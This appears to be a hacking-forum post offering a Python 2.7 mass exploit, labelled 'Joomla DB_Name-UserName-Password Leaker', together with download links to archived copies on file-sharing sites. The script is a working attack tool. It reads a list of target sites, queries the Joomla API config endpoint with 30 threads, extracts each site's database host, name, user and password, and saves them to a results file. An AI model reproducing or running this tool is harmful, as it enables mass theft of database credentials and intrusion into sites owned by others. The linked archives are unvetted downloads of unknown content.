Joomla
DB_Name-UserName-Password Leaker
Source Code
Python Version: 2.7.18
Use Of:
↓
Kod:
https://t.me/LamerMarket/5
https://dosya.co/0zbqukh9diu6/Joomla_Exploit-P4$A.rar.html
https://anonfiles.com/M4pfF4hezb/Joomla_Exploit_P4_A_rar
Python:
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
init(autoreset=True)
r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL
def jomprv(url):
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}
asw = requests.get(url+ '/api/index.php/v1/config/application?public=true',headers=headers,timeout=10)
if 'dbtype' in asw.content:
hoset = re.findall('"host":"(.*?)"',asw.content)[0]
debst = re.findall('"db":"(.*?)"',asw.content)[0]
uset = re.findall('"user":"(.*?)"',asw.content)[0]
paset = re.findall('"password":"(.*?)"',asw.content)[0]
print ("Domain" + " : " + url)
print (g + "HOST" + " : " + hoset)
print (g + "DB" + " : " + debst)
print (g + "User" + " : " + uset)
print (g + "Pass" + " : " + paset)
open('result.txt', 'a').write('\n!== Results Joomla ==!\n'+ 'DOMAIN' + ' : ' + url +'\nHOST' + ' : ' + hoset+'\nDB' + ' : ' +debst+'\nUSER' + ' : ' + uset+'\nPASS' + ' : ' + paset+'\n')
else:
print(r+ 'BAD' + ' ' + url)
#for res in regex:
except:
pass
print ("{}Cracked By P4$A | Site List -->\n").format(y)
url = open(raw_input(o+'List:~# '),'r').read().splitlines()
pool = ThreadPool(int(30))
pool.map(jomprv, url)
pool.close()
pool.join()